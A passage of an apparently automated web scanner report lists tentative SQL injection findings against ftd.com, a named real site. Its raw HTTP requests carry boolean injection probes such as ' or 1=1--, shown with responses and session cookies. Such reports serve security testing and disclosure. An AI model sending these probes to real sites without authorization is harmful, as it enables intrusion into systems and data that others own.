<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       w
...[SNIP]...

1.13. http://www.ftd.com/351/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /351/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 16543645'%20or%201%3d1--%20 and 16543645'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /35116543645'%20or%201%3d1--%20/favicon.ico HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926; mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3; mbcs=544E1284-8127-56AF-A20F-90F1DFEB835D; s_vi=[CS]v1|26E39E5A851D17D3-60000106401BCEE7[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221304902842245_1861%22%7D; fsr.a=1304902868631

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:14:56 GMT
X-Varnish: 750185848
Age: 14
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 750185848</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /35116543645'%20or%201%3d2--%20/favicon.ico HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926; mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3; mbcs=544E1284-8127-56AF-A20F-90F1DFEB835D; s_vi=[CS]v1|26E39E5A851D17D3-60000106401BCEE7[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221304902842245_1861%22%7D; fsr.a=1304902868631

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123189
Date: Mon, 09 May 2011 01:14:57 GMT
X-Varnish: 750186654
Age: 1
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...

1.14. http://www.ftd.com/351/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /351/favicon.ico

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 11294463'%20or%201%3d1--%20 and 11294463'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /351/favicon.ico11294463'%20or%201%3d1--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926; mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3; mbcs=544E1284-8127-56AF-A20F-90F1DFEB835D; s_vi=[CS]v1|26E39E5A851D17D3-60000106401BCEE7[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221304902842245_1861%22%7D; fsr.a=1304902868631

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:16:47 GMT
X-Varnish: 540364982
Age: 16
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 540364982</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /351/favicon.ico11294463'%20or%201%3d2--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926; mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3; mbcs=544E1284-8127-56AF-A20F-90F1DFEB835D; s_vi=[CS]v1|26E39E5A851D17D3-60000106401BCEE7[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221304902842245_1861%22%7D; fsr.a=1304902868631

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123189
Date: Mon, 09 May 2011 01:16:48 GMT
X-Varnish: 540365912
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...

1.15. http://www.ftd.com/351/v20110407/ftd.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /351/v20110407/ftd.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 10658399'%20or%201%3d1--%20 and 10658399'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /35110658399'%20or%201%3d1--%20/v20110407/ftd.css?markcode=351&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c1=%7B%22referrer_before_redirect%22%3A%22%22%7D; TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; fsr.a=1304902825762; markcode=351

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:08:14 GMT
X-Varnish: 729990668
Age: 21
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 729990668</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /35110658399'%20or%201%3d2--%20/v20110407/ftd.css?markcode=351&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c1=%7B%22referrer_before_redirect%22%3A%22%22%7D; TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; fsr.a=1304902825762; markcode=351

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123303
Date: Mon, 09 May 2011 01:08:14 GMT
X-Varnish: 540338180
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...

1.16. http://www.ftd.com/351/v20110407/ftd.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /351/v20110407/ftd.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 92130663'%20or%201%3d1--%20 and 92130663'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /351/v2011040792130663'%20or%201%3d1--%20/ftd.css?markcode=351&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c1=%7B%22referrer_before_redirect%22%3A%22%22%7D; TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; fsr.a=1304902825762; markcode=351

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:10:21 GMT
X-Varnish: 729997969
Age: 15
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 729997969</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /351/v2011040792130663'%20or%201%3d2--%20/ftd.css?markcode=351&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c1=%7B%22referrer_before_redirect%22%3A%22%22%7D; TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; fsr.a=1304902825762; markcode=351

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123303
Date: Mon, 09 May 2011 01:10:23 GMT
X-Varnish: 729998810
Age: 1
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...

1.17. http://www.ftd.com/351/v20110407/ftd.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /351/v20110407/ftd.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 31033777'%20or%201%3d1--%20 and 31033777'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /351/v20110407/ftd.css31033777'%20or%201%3d1--%20?markcode=351&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c1=%7B%22referrer_before_redirect%22%3A%22%22%7D; TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; fsr.a=1304902825762; markcode=351

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:12:16 GMT
X-Varnish: 730004563
Age: 15
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 730004563</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /351/v20110407/ftd.css31033777'%20or%201%3d2--%20?markcode=351&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c1=%7B%22referrer_before_redirect%22%3A%22%22%7D; TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; fsr.a=1304902825762; markcode=351

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123303
Date: Mon, 09 May 2011 01:12:17 GMT
X-Varnish: 750176867
Age: 1
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...

1.18. http://www.ftd.com/empty/index.epl [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /empty/index.epl

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 73558935'%20or%201%3d1--%20 and 73558935'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /empty73558935'%20or%201%3d1--%20/index.epl HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; fsr.a=1304902834223; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:01:20 GMT
X-Varnish: 869409209
Age: 10
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 869409209</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /empty73558935'%20or%201%3d2--%20/index.epl HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
